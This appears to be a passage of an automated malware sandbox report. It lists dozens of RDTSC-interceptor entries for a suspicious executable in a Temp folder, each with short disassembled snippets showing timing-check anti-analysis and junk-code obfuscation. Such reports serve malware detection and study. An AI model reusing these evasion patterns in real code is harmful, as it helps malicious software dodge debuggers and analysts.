                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55F240 second address: 55F244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 55F38D second address: 55F391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 507A15 second address: 507A2F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C28D8B356h 0x00000008 jbe 00007F4C28D8B356h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jno 00007F4C28D8B356h 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 566249 second address: 56624E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56624E second address: 566267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B35Ch 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 566267 second address: 56626E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56626E second address: 56628E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F4C28D8B364h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F6B9 second address: 51F6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F6BD second address: 51F6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F6C3 second address: 506DF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4C288D0394h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F4C288D0388h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub edi, 28592DE2h 0x00000031 jp 00007F4C288D038Ch 0x00000037 mov dword ptr [ebp+122D327Eh], esi 0x0000003d call dword ptr [ebp+122D322Dh] 0x00000043 push eax 0x00000044 push edx 0x00000045 jne 00007F4C288D03A4h 0x0000004b pushad 0x0000004c push esi 0x0000004d pop esi 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 popad 0x00000051 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51F8DE second address: 51F8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FB35 second address: 51FB58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F4C288D038Eh 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF26 second address: 51FF30 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C28D8B35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF30 second address: 51FF79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F4C288D039Dh 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F4C288D0388h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF79 second address: 51FF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF7D second address: 51FF87 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 51FF87 second address: 51FF91 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C28D8B35Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520051 second address: 520055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52093F second address: 520945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520AC0 second address: 507A15 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C288D0388h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ecx, ebx 0x0000000f call dword ptr [ebp+1244BF0Dh] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E0E76 second address: 4E0E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4C28D8B35Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F4C28D8B356h 0x00000015 jnp 00007F4C28D8B356h 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E0E99 second address: 4E0EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565834 second address: 565838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565838 second address: 56583E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565E5C second address: 565E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 565E63 second address: 565E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B036 second address: 56B046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C28D8B356h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B046 second address: 56B057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C288D0386h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B5EE second address: 56B5FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B5FB second address: 56B60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B74B second address: 56B77A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4C28D8B362h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA43 second address: 56BA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA47 second address: 56BA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C28D8B35Bh 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA58 second address: 56BA5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA5F second address: 56BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F4C28D8B356h 0x0000000f jmp 00007F4C28D8B363h 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56EDD5 second address: 56EDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56EDDE second address: 56EDE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56EDE6 second address: 56EDF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F4C288D0386h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56E6A4 second address: 56E6A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56E6A9 second address: 56E6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56E6AF second address: 56E6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56E6BF second address: 56E6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56E6C5 second address: 56E6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5713A4 second address: 5713A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 570F19 second address: 570F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C28D8B356h 0x0000000a pop ecx 0x0000000b jmp 00007F4C28D8B369h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jbe 00007F4C28D8B356h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e jmp 00007F4C28D8B369h 0x00000023 push ecx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pop ecx 0x00000027 push edx 0x00000028 jmp 00007F4C28D8B365h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4DA2F4 second address: 4DA2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4DA2FA second address: 4DA308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C28D8B35Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 576613 second address: 576619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 576619 second address: 57661F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 576BBD second address: 576BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 576D1B second address: 576D28 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 576D28 second address: 576D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4C288D0386h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4C288D0395h 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52041F second address: 520423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520423 second address: 52046E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jng 00007F4C288D0386h 0x0000000f mov ebx, dword ptr [ebp+12480523h] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F4C288D0388h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D31F0h], edx 0x00000035 add eax, ebx 0x00000037 jbe 00007F4C288D038Bh 0x0000003d add dx, ABAAh 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52046E second address: 520472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520472 second address: 520476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520476 second address: 52047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52047C second address: 520481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52051A second address: 52051E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52051E second address: 520527 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 520603 second address: 520607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 576EF2 second address: 576EFC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C288D0386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57BCB5 second address: 57BD0F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F4C28D8B36Ah 0x00000010 jmp 00007F4C28D8B35Ah 0x00000015 push esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop esi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d jmp 00007F4C28D8B365h 0x00000022 jnl 00007F4C28D8B356h 0x00000028 pop edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jg 00007F4C28D8B356h 0x00000031 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57BD0F second address: 57BD37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Fh 0x00000007 jmp 00007F4C288D0395h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57BD37 second address: 57BD3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57B004 second address: 57B014 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57B014 second address: 57B018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57B737 second address: 57B73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57B73C second address: 57B744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57B744 second address: 57B75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C288D038Ch 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57B75E second address: 57B762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 57F1E5 second address: 57F1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5853CD second address: 5853D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5853D3 second address: 5853D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5853D9 second address: 5853E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5853E1 second address: 5853E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5853E7 second address: 5853F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F4C28D8B356h 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 585579 second address: 58559D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0399h 0x00000009 jng 00007F4C288D0386h 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 585747 second address: 585751 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4C28D8B362h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 585751 second address: 585757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 585757 second address: 585788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F4C28D8B365h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4C28D8B362h 0x00000015 rdtsc
